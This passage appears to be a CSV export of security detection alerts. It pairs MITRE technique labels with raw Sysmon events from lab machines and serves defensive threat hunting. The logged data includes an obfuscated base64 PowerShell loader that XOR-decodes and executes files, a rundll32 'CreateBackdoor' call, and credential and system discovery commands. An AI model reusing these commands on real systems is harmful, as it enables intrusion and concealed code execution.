ABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T12:36:03.901088Z"">
</TimeCreated>
<EventRecordID>244341</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2844"" ThreadID=""3648"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 12:36:03.899</Data>
<Data Name=""ProcessGuid"">747F3D96-0A33-5E76-0000-0010B8813D00</Data>
<Data Name=""ProcessId"">3696</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-069C-5E76-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-08DA-5E76-0000-001054382E00</Data>
<Data Name=""ParentProcessId"">2632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine (&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;) in directory : ( C:\Windows\system32\ ); svchost.exe was started with no -k service-group argument by a parent in a user profile path, not by services.exe",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-26T04:01:43.567204Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""984"" ThreadID=""2352"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-26 04:01:43.557</Data>
<Data Name=""ProcessGuid"">365ABB72-0FA7-5CEA-0000-001064C60A00</Data>
<Data Name=""ProcessId"">3908</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8DBD-5CEA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0FA6-5CEA-0000-0010FEC30A00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\info.rar\jjs.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-26T04:01:43.567204Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""984"" ThreadID=""2352"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-26 04:01:43.557</Data>
<Data Name=""ProcessGuid"">365ABB72-0FA7-5CEA-0000-001064C60A00</Data>
<Data Name=""ProcessId"">3908</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8DBD-5CEA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0FA6-5CEA-0000-0010FEC30A00</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\info.rar\jjs.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.448945Z"">
</TimeCreated>
<EventRecordID>26</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.418</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Sysmon Event 7 ImageLoad - powershell.exe (PID 1200) loaded C:\Windows\System32\samlib.dll which the Sysmon config tagged technique_id=T1003; note this event records a DLL load only and shows no handle to lsass.exe,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.448945Z"">
</TimeCreated>
<EventRecordID>26</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.418</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
</TimeCreated>
<EventRecordID>243550</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
<Data Name=""ProcessId"">8160</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.350815Z"">
</TimeCreated>
<EventRecordID>5889</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.310</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00109767FF00</Data>
<Data Name=""ProcessId"">3096</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAd
ABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
</TimeCreated>
<EventRecordID>243550</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
<Data Name=""ProcessId"">8160</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T21:45:04.922610Z"">
</TimeCreated>
<EventRecordID>244866</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2844"" ThreadID=""3648"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 21:45:04.909</Data>
<Data Name=""ProcessGuid"">747F3D96-8AE0-5E76-0000-0010933B8003</Data>
<Data Name=""ProcessId"">7708</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">c:\Users\Public\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-06A4-5E76-0000-002087DE0200</Data>
<Data Name=""LogonId"">0x2de87</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-06AA-5E76-0000-001046E10400</Data>
